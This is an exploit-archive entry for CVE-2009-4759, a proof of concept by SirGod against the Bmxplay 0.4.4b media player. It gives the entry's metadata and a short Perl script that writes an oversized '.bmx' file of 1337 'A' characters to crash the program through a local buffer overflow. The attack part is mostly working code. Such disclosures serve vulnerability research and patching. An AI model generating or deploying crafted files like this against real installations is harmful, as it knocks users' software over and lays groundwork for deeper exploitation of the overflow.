Bmxplay 0.4.4b - '.bmx' Local Buffer Overflow (PoC)

Author: SirGod
type: dos
platform: windows
port: 
date_added: 2009-05-03  
date_updated:   
verified: 1  
codes: OSVDB-63339;CVE-2009-4759  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 8607.pl  
#####################################################################################################
#                    Bmxplay 0.4.4b (.BMX File) Local Buffer Overflow PoC
#                 Discovered by SirGod  -  www.mortal-team.net & www.h4cky0u.org
#               Downlaod : http://www.brothersoft.com/bmxplay-download-235557.html
######################################################################################################
my $chars= "A" x 1337;
my $file="sirgod.bmx";
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $chars;
close($FILE);
print "$file was created";
print "SirGod - www.mortal-team.net & www.h4cky0u.org";

# milw0rm.com [2009-05-04]